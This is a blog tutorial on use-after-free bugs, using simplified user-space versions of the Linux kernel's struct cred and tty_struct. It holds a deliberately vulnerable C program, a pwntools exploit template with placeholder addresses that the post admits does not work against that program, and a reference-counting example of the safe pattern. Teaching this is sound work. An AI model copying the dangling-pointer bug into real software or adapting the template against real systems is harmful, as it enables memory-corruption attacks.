strangerRidingCaml

9. Use-After-Free (UAF) Vulnerabilities (feat. struct cred, tty_struct)

Linux kernel exploit


woddlwoddl 2024. 5. 12. 03:04
Use-After-Free (UAF) Vulnerabilities (feat. struct cred, tty_struct)


Use-After-Free (UAF) vulnerabilities occur when a program continues to use a pointer after the memory it points to has been freed, potentially leading to memory corruption or code execution.

Lab Activity: Use-After-Free (UAF) Exploit

In this lab activity, we'll demonstrate a UAF exploit on a vulnerable C program, featuring struct cred and tty_struct.

Defender Side Code:

The defender side code simulates a vulnerable program that allocates a struct cred and a tty_struct, frees the struct cred, and then keeps using the dangling pointer, which is the UAF.


#include <stdio.h>
#include <stdlib.h>

// Simplified user-space stand-ins for the kernel's struct cred and tty_struct
struct cred {
    int uid;
    int gid;
    // Other fields
};

struct tty_struct {
    int index;  // Placeholder field (an empty struct is not valid standard C)
};

void vulnerable_function(struct cred *ptr_cred, struct tty_struct *ptr_tty) {
    free(ptr_cred);  // Free the struct cred object; ptr_cred now dangles
    // Do some other operations (a same-sized allocation may reuse the freed chunk)
    printf("uid after free: %d\n", ptr_cred->uid);  // Use after free: reads freed memory
    (void)ptr_tty;  // tty_struct is still live here; only the cred was freed
}

int main(void) {
    // Allocate memory for struct cred and tty_struct
    struct cred *ptr_cred = malloc(sizeof(struct cred));
    struct tty_struct *ptr_tty = malloc(sizeof(struct tty_struct));
    if (ptr_cred == NULL || ptr_tty == NULL) {
        return 1;
    }
    ptr_cred->uid = 1000;
    ptr_cred->gid = 1000;
    ptr_tty->index = 0;

    vulnerable_function(ptr_cred, ptr_tty);  // Call vulnerable function
    free(ptr_tty);
    return 0;
}

To compile the defender side code:

gcc -o vulnerable_program vulnerable_program.c

Exploit Code (Python using pwntools):


from pwn import *

# Address of the vulnerable function
vulnerable_function_addr = 0x004005f7  # Example address, adjust as necessary

# Address of system function or other desired function
system_addr = 0x00400500  # Example address, adjust as necessary

# Start the vulnerable program
p = process("./vulnerable_program")

# Payload meant to land in the freed struct cred chunk and overwrite it with
# the system function address. The lab program above reads no input, so this
# only has an effect against a build that reads attacker data into that chunk.
payload = b"A" * 8 + p64(system_addr)
p.sendline(payload)

# Interactive session
p.interactive()

The exploit code constructs a payload intended to overwrite the freed struct cred object with the address of the system function (or any other desired function), starts the vulnerable program, sends the payload, and drops to an interactive session if control over execution is gained. Note that the lab program above never reads input, so the payload illustrates the technique rather than being a working exploit against that binary.
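The kernel avoids the pattern in the lab by reference-counting struct cred: a holder such as a tty takes its own reference, and the object is freed only when the last holder drops it. The following is an added user-space example, not code from the post or from the kernel; prepare_creds, get_cred and put_cred are simplified stand-ins named after the kernel API, the tty's opener field is hypothetical, and creds_freed is a constructed counter so the lifetime can be checked.

```c
#include <stdlib.h>

/* Constructed stand-in for the kernel's struct cred, guarded by a refcount. */
struct cred {
    int refcount;
    unsigned int uid;
    unsigned int gid;
};

/* Constructed stand-in for tty_struct: the tty keeps a reference to the
 * credentials of the task that opened it (hypothetical field name). */
struct tty_struct {
    struct cred *opener;
};

static int creds_freed;  /* counts real frees so callers can check when they happen */

/* Allocate a cred with one reference owned by the caller. */
struct cred *prepare_creds(unsigned int uid, unsigned int gid) {
    struct cred *c = calloc(1, sizeof *c);
    if (c == NULL) return NULL;
    c->refcount = 1;
    c->uid = uid;
    c->gid = gid;
    return c;
}

/* Take a reference before storing the pointer in another holder. */
struct cred *get_cred(struct cred *c) {
    c->refcount++;
    return c;
}

/* Drop the holder's reference and clear its pointer so it cannot dangle;
 * the object is freed only when the last reference goes away. */
void put_cred(struct cred **slot) {
    struct cred *c = *slot;
    *slot = NULL;
    if (--c->refcount == 0) {
        free(c);
        creds_freed++;
    }
}

/* Scenario from the lab done safely: the task drops its cred while the tty
 * still holds one. Returns the uid the tty still sees after the task is gone. */
unsigned int tty_uid_after_task_exit(void) {
    struct cred *task_cred = prepare_creds(1000, 1000);
    struct tty_struct tty = { .opener = get_cred(task_cred) };
    put_cred(&task_cred);              /* task exits; object survives, refcount 1 */
    unsigned int uid = tty.opener->uid; /* valid read: the tty owns a reference */
    put_cred(&tty.opener);             /* last holder drops it; freed now */
    return uid;
}
```

The first put_cred leaves task_cred NULL rather than dangling, so a later stale use faults immediately instead of reading whatever reused the chunk.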